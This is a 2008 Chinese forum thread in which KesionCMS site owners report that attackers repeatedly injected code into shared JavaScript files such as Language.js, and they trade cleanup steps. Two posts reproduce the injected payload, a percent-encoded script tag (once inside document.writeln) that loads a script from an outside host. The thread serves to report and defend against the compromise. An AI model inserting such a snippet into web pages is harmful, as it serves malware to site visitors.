账号通
    

账号  

密码  

4472

查看

13

回复
主题:[注意]漏洞报告:Language.js [收藏主题] 转到:  
tean 当前离线

58

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:823 分
登录次数:64 次
注册时间:2007/8/2
最后登录:2009/12/10
tean 发表于:2008/5/17 9:49:00   | 只看该作者 查看该作者主题 楼主 
做在线知识付费 选科汛云开店

我的网站TOOKMAX 昨晚七时左右打开时,360安全卫士警告


[


发现挂马网页


http://a.8e9.net/cnzz.htm


]


 


打开这个链接后出现"站长统计"四个字,点击后是站长统计的登录页面


 


查看八易娱乐网的站点统计


 


------------------------------------------------


在搜索引擎上搜索不到任何相关信息


用排除法终于查到


 


/KS_inc/Language.js


 


被更改过,删除最后几行代码[删的太急,没有拷贝下来]后恢复正常


因为不想在页面去掉"繁体中文"这个功能,所以没有将Language.js改名,只是更改Ks_ins文件夹和所有文件属性为只读...


 


结果你猜出怎么样? 今天早上打开网站,竟然又被改了!!!!!!!!!


无奈只好去掉"繁体中文"这个功能了


 


记得以前KS_inc这个目录下的Ajax.js也被挂马的瞄上了,现在又开始改其它的JS文件,以后不知又会改哪个文件,
希望官方能予以关注下


-----------------------------------------


顺便在这里鄙视(竖两根中指)一下那些挂马的:


现在谁挣个钱都不容易,无论你们是出于什么目的这么做,丫有本事对着国外的网站使劲去, 别在这窝里横,这不叫本事
对我们这些可怜的中小站长下手,你就有成就感么?

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
moson30 当前离线

763

主题

0

广播

0

粉丝
添加关注
级别:六年级

用户积分:5090 分
登录次数:245 次
注册时间:2007/3/31
最后登录:2010/4/27
moson30 发表于:2008/8/7 11:21:00   | 只看该作者 查看该作者主题 沙发 
科汛智能建站系统
莫非下一个该是我了?
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
moson30 当前离线

763

主题

0

广播

0

粉丝
添加关注
级别:六年级

用户积分:5090 分
登录次数:245 次
注册时间:2007/3/31
最后登录:2010/4/27
moson30 发表于:2008/7/12 11:44:00   | 只看该作者 查看该作者主题 藤椅 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
buben945 当前离线

168

主题

0

广播

0

粉丝
添加关注
级别:一年级

用户积分:1797 分
登录次数:134 次
注册时间:2008/1/21
最后登录:2016/2/23
buben945 发表于:2008/7/12 11:12:00   | 只看该作者 查看该作者主题 板凳 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
shuisheng 当前离线

324

主题

1

广播

0

粉丝
添加关注
级别:三年级

用户积分:3360 分
登录次数:188 次
注册时间:2007/9/11
最后登录:2013/6/6
shuisheng 发表于:2008/8/7 2:32:00   | 只看该作者 查看该作者主题 报纸 
科汛智能建站系统

5.01的照挂不勿。。。我也受不了了,3个站被挂。。。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
tean 当前离线

58

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:823 分
登录次数:64 次
注册时间:2007/8/2
最后登录:2009/12/10
tean 发表于:2008/7/12 18:29:00   | 只看该作者 查看该作者主题 地板 
科汛在线网校系统

备份数据库,清空服务器文件........重装CMS,恢复数据库文件........,总算是熬过来了

...这算是妥协了吧

不知5.0是不是要好一些了

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
diyu1123 当前离线

81

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:888 分
登录次数:68 次
注册时间:2006/11/19
最后登录:2009/5/31
diyu1123 发表于:2008/6/4 9:24:00   | 只看该作者 查看该作者主题 7楼 
做在线知识付费 选科汛云开店
我也被挂了  靠他丫的
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
wancn 当前离线

315

主题

0

广播

0

粉丝
添加关注
级别:三年级

用户积分:3644 分
登录次数:448 次
注册时间:2007/9/19
最后登录:2012/12/5
wancn 发表于:2008/6/3 17:18:00   | 只看该作者 查看该作者主题 8楼 
科汛在线考试系统(NET)

我是反反复复的被挂了这个木马.和大家遇到的情况一模一样.

没删几分钟就又来了.

我已经没招了.

百度一下,http://www.baidu.com/s?wd=%3Cscript+src%3Dhttp%3A%2F%2F%2561%252E%2538%2565%2539%252E%256E%2565%2574%2F%2531%252E%256A%2573%3E%3C%2Fscript%3E

全是科讯用户被挂的这个木马.看来这个木马就是针对咱科讯用户的.希望官方重视.

 

 

就是这段代码

<script src=http://%61%2E%38%65%39%2E%6E%65%74/%31%2E%6A%73></script>

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
miforum 当前离线

466

主题

0

广播

0

粉丝
添加关注
级别:四年级

用户积分:5808 分
登录次数:456 次
注册时间:2006/12/2
最后登录:2012/11/1
miforum 发表于:2008/5/17 16:03:00   | 只看该作者 查看该作者主题 9楼 
科汛智能建站系统

是的,他插代码的都是一些公用调用的JS,这样访客中标的几率大。

我昨晚打开首页,卡巴叫的不停,疯狂下载,MD,自己的电脑已经中标了,任务管理器都打不开,卡巴什么的都打不开。

随后,删掉所有ASP文件,设置那些目录只读。cao这帮垃圾!

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
tean 当前离线

58

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:823 分
登录次数:64 次
注册时间:2007/8/2
最后登录:2009/12/10
tean 发表于:2008/5/17 15:30:00   | 只看该作者 查看该作者主题 10楼 

刚看着你的贴子,网站又被挂上了........还是那个鸟网站

 

document.writeln("<script src=http:\/\/%61%2E%38%65%39%2E%6E%65%74\/%31%2E%6A%73><\/script>");

 

这回是在我自己写的JS文件中被弄上的...看来,他们是查看页面源代码找到网站共同调用的JS文件加码的

这下只能改目录权限了

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行2.84570秒 powered by KesionCMS 9.0